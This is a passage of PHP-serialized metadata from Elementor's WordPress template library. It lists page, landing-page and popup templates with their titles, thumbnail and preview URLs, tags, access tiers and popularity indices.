Service\"]\";s:10:\"menu_order\";i:11;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:200;a:21:{s:4:\"tmpl\";i:1132;s:2:\"id\";i:16553;s:5:\"title\";s:31:\"Fly-In | Contact | Beauty Salon\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/12/PopUp.jpg\";s:12:\"tmpl_created\";i:1608622602;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fly-in-contact-beauty-salon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:23:\"[\"Beauty Salon\",\"Hair\"]\";s:10:\"menu_order\";i:12;s:16:\"popularity_index\";i:691;s:11:\"trend_index\";i:428;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:201;a:21:{s:4:\"tmpl\";i:1441;s:2:\"id\";i:24574;s:5:\"title\";s:27:\"Wireframe – Contact 5\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Contact-5.jpg\";s:12:\"tmpl_created\";i:1653989135;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-contact-5/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:88:\"[\"Business\",\"Contact\",\"Footer\",\"Form\",\"Google Maps\",\"Header\",\"Professional\",\"Subscribe\"]\";s:10:\"menu_order\";i:12;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:202;a:21:{s:4:\"tmpl\";i:1217;s:2:\"id\";i:20333;s:5:\"title\";s:40:\"Plant Pots Online Shop – eCommerce\";s:9:\"thumbnail\";s:93:\"https://library.elementor.com/wp-content/uploads/2021/10/Plant-Pots-Online-Shop-250x280-2.jpg\";s:12:\"tmpl_created\";i:1634042184;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/lp/plant-pots-online-shop-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:50:\"[\"Ecommerce\",\"Landing Pages\",\"Online Shop\",\"Shop\"]\";s:10:\"menu_order\";i:12;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:203;a:21:{s:4:\"tmpl\";i:1211;s:2:\"id\";i:20447;s:5:\"title\";s:33:\"Shared Workspace – Business\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/10/250x280-Shared-Workspace.jpg\";s:12:\"tmpl_created\";i:1633884934;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/shared-workspace-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:28:\"[\"Business\",\"Landing Pages\"]\";s:10:\"menu_order\";i:13;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:204;a:21:{s:4:\"tmpl\";i:1237;s:2:\"id\";i:21313;s:5:\"title\";s:34:\"Spa & Beauty – Services\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2021/12/Spa-Beauty-Treatments-page-1.jpg\";s:12:\"tmpl_created\";i:1638819709;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/spa-beauty-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:55:\"[\"Beauty\",\"Hair\",\"Health\",\"Services\",\"Spa\",\"Treatment\"]\";s:10:\"menu_order\";i:13;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:205;a:21:{s:4:\"tmpl\";i:1004;s:2:\"id\";i:13538;s:5:\"title\";s:32:\"Fly-In | Newsletter | Barbershop\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2020/05/Pop-Up-Page-Small.jpg\";s:12:\"tmpl_created\";i:1589893364;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:134:\"https://library.elementor.com/popups/fly-in-newsletter-barbershop/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:28:\"[\"Barber Shop\",\"Barbershop\"]\";s:10:\"menu_order\";i:13;s:16:\"popularity_index\";i:710;s:11:\"trend_index\";i:667;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:206;a:21:{s:4:\"tmpl\";i:924;s:2:\"id\";i:12550;s:5:\"title\";s:32:\"Fly-in | Sale | Travel and Tours\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2019/12/PopUp_s.png\";s:12:\"tmpl_created\";i:1575960263;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/flyin-sale-travel-and-tours/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:18:\"[\"Tours\",\"Travel\"]\";s:10:\"menu_order\";i:14;s:16:\"popularity_index\";i:754;s:11:\"trend_index\";i:791;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:207;a:21:{s:4:\"tmpl\";i:1212;s:2:\"id\";i:20479;s:5:\"title\";s:49:\"Teeth Straightening – Health & Fitness\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/10/250x280-Teeth-Whitening.jpg\";s:12:\"tmpl_created\";i:1633886115;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/lp/teeth-straightening-health-fitness/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Health and Fitness\";s:4:\"tags\";s:46:\"[\"Business\",\"Dental\",\"Health\",\"Landing Pages\"]\";s:10:\"menu_order\";i:14;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:208;a:21:{s:4:\"tmpl\";i:1234;s:2:\"id\";i:21234;s:5:\"title\";s:34:\"Insurance Company – Services\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2021/12/15-Services-Insurance-Company.jpg\";s:12:\"tmpl_created\";i:1638818688;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/insurance-company-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:51:\"[\"Faq\",\"Form\",\"Insurance\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:14;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:209;a:21:{s:4:\"tmpl\";i:1035;s:2:\"id\";i:15062;s:5:\"title\";s:35:\"Fly-In | Sign up | Flooring Company\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/08/PopUp.png\";s:12:\"tmpl_created\";i:1597739629;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:137:\"https://library.elementor.com/popups/fly-in-sign-up-flooring-company/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"fly-in\";s:4:\"tags\";s:39:\"[\"Flooring company\",\"Flooring website\"]\";s:10:\"menu_order\";i:15;s:16:\"popularity_index\";i:625;s:11:\"trend_index\";i:309;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:210;a:21:{s:4:\"tmpl\";i:1209;s:2:\"id\";i:20394;s:5:\"title\";s:30:\"Time Management – Events\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2021/10/Time-Management-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633884077;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/time-management-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:17:\"[\"Landing Pages\"]\";s:10:\"menu_order\";i:15;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:211;a:21:{s:4:\"tmpl\";i:1229;s:2:\"id\";i:21118;s:5:\"title\";s:28:\"Contact – Plants Store\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/12/12-Contact-Plants-Store.jpg\";s:12:\"tmpl_created\";i:1638802472;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/contact-plants-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:40:\"[\"Contact\",\"Info\",\"Plant\",\"Testimonial\"]\";s:10:\"menu_order\";i:15;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:212;a:21:{s:4:\"tmpl\";i:893;s:2:\"id\";i:11822;s:5:\"title\";s:30:\"Full Screen | Menu | Portfolio\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/09/PopUp_small.png\";s:12:\"tmpl_created\";i:1569429896;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/full-screen-menu-portfolio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:16;s:16:\"popularity_index\";i:654;s:11:\"trend_index\";i:626;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:213;a:21:{s:4:\"tmpl\";i:1203;s:2:\"id\";i:18591;s:5:\"title\";s:28:\"Coffee Sale – Business\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/04/250x280-7.png\";s:12:\"tmpl_created\";i:1633877319;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/coffee-sale-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:33:\"[\"Coffee\",\"Landing Pages\",\"Sale\"]\";s:10:\"menu_order\";i:16;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:214;a:21:{s:4:\"tmpl\";i:1231;s:2:\"id\";i:21184;s:5:\"title\";s:28:\"Dental Care – Services\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/12/14-Services-Dental-Care.jpg\";s:12:\"tmpl_created\";i:1638807148;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/dental-care-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:45:\"[\"Dental\",\"Medical\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:16;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:215;a:21:{s:4:\"tmpl\";i:1064;s:2:\"id\";i:15580;s:5:\"title\";s:31:\"Fullscreen | Menu | Travel Blog\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/11/PopUp-Menu.jpg\";s:12:\"tmpl_created\";i:1606215358;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fullscreen-menu-travel-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:17;s:16:\"popularity_index\";i:673;s:11:\"trend_index\";i:348;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:216;a:21:{s:4:\"tmpl\";i:1133;s:2:\"id\";i:16645;s:5:\"title\";s:28:\"Headphones – eCommerce\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2021/01/lp_headphones.png\";s:12:\"tmpl_created\";i:1609944115;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/lp/commerce-headphones/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:39:\"[\"Ecommerce\",\"Landing Pages\",\"Product\"]\";s:10:\"menu_order\";i:17;s:16:\"popularity_index\";i:633;s:11:\"trend_index\";i:87;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:217;a:21:{s:4:\"tmpl\";i:1442;s:2:\"id\";i:24584;s:5:\"title\";s:27:\"Wireframe – Pricing 1\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Pricing-1.jpg\";s:12:\"tmpl_created\";i:1653989152;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-pricing-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:146:\"[\"Booking\",\"Business\",\"Clients\",\"Contact\",\"Faq\",\"Features\",\"Footer\",\"Online Service\",\"Pricing\",\"Products\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:17;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:218;a:21:{s:4:\"tmpl\";i:1138;s:2:\"id\";i:16762;s:5:\"title\";s:25:\"Conference – Events\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2021/01/Conference.png\";s:12:\"tmpl_created\";i:1610455119;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/lp/conference-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:60:\"[\"Conference\",\"Convention\",\"Event\",\"Events\",\"Landing Pages\"]\";s:10:\"menu_order\";i:18;s:16:\"popularity_index\";i:705;s:11:\"trend_index\";i:216;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:219;a:21:{s:4:\"tmpl\";i:1438;s:2:\"id\";i:24539;s:5:\"title\";s:27:\"Wireframe – Contact 2\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Contact-2.jpg\";s:12:\"tmpl_created\";i:1653989019;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-contact-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:69:\"[\"Business\",\"Contact\",\"Footer\",\"Google Maps\",\"Header\",\"Professional\"]\";s:10:\"menu_order\";i:18;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:220;a:21:{s:4:\"tmpl\";i:981;s:2:\"id\";i:13281;s:5:\"title\";s:37:\"Hello Bar | Contact | Interior Design\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/04/PopUp.png\";s:12:\"tmpl_created\";i:1586148801;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/hello-bar-contact-interior-design/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:19:\"[\"Interior Design\"]\";s:10:\"menu_order\";i:18;s:16:\"popularity_index\";i:763;s:11:\"trend_index\";i:679;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:221;a:21:{s:4:\"tmpl\";i:1052;s:2:\"id\";i:15259;s:5:\"title\";s:31:\"Hello Bar | Menu | Psychologist\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/09/Menu-PopUp.png\";s:12:\"tmpl_created\";i:1600170209;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/hello-bar-menu-psychologist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:19;s:16:\"popularity_index\";i:739;s:11:\"trend_index\";i:583;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:222;a:21:{s:4:\"tmpl\";i:1434;s:2:\"id\";i:24494;s:5:\"title\";s:28:\"Wireframe – Services 1\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-1.jpg\";s:12:\"tmpl_created\";i:1653988874;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/wireframe-services-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:53:\"[\"Business\",\"Faq\",\"Footer\",\"Professional\",\"Services\"]\";s:10:\"menu_order\";i:19;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:223;a:21:{s:4:\"tmpl\";i:1194;s:2:\"id\";i:18701;s:5:\"title\";s:32:\"Digital Course – eCommerce\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2021/04/250x280.jpg\";s:12:\"tmpl_created\";i:1618995134;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/digital-course-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:57:\"[\"Course Online\",\"Ecommerce\",\"Landing Pages\",\"Marketing\"]\";s:10:\"menu_order\";i:19;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:224;a:21:{s:4:\"tmpl\";i:1192;s:2:\"id\";i:18612;s:5:\"title\";s:34:\"Bag Product Sale – eCommerce\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Bag-Product.jpeg\";s:12:\"tmpl_created\";i:1618395406;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/bag-product-sale-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:61:\"[\"Bag\",\"Ecommerce\",\"Landing Pages\",\"Product\",\"Sale\",\"Travel\"]\";s:10:\"menu_order\";i:20;s:16:\"popularity_index\";i:875;s:11:\"trend_index\";i:605;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:225;a:21:{s:4:\"tmpl\";i:1227;s:2:\"id\";i:21083;s:5:\"title\";s:26:\"Conference – Contact\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2021/12/10-Contact-Conference.jpg\";s:12:\"tmpl_created\";i:1638799208;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/conference-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:44:\"[\"Conference\",\"Contact\",\"Form\",\"Info\",\"Map\"]\";s:10:\"menu_order\";i:20;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:26:\"minimum_hello_plus_version\";s:5:\"0.0.0\";s:8:\"products\";s:7:\"regular\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:226;a:21:{s:4:\"tmpl\";i:1193;s:2:\"id\";i:18644;s:5:\"title\";s:37:\"Camera Product Sale – 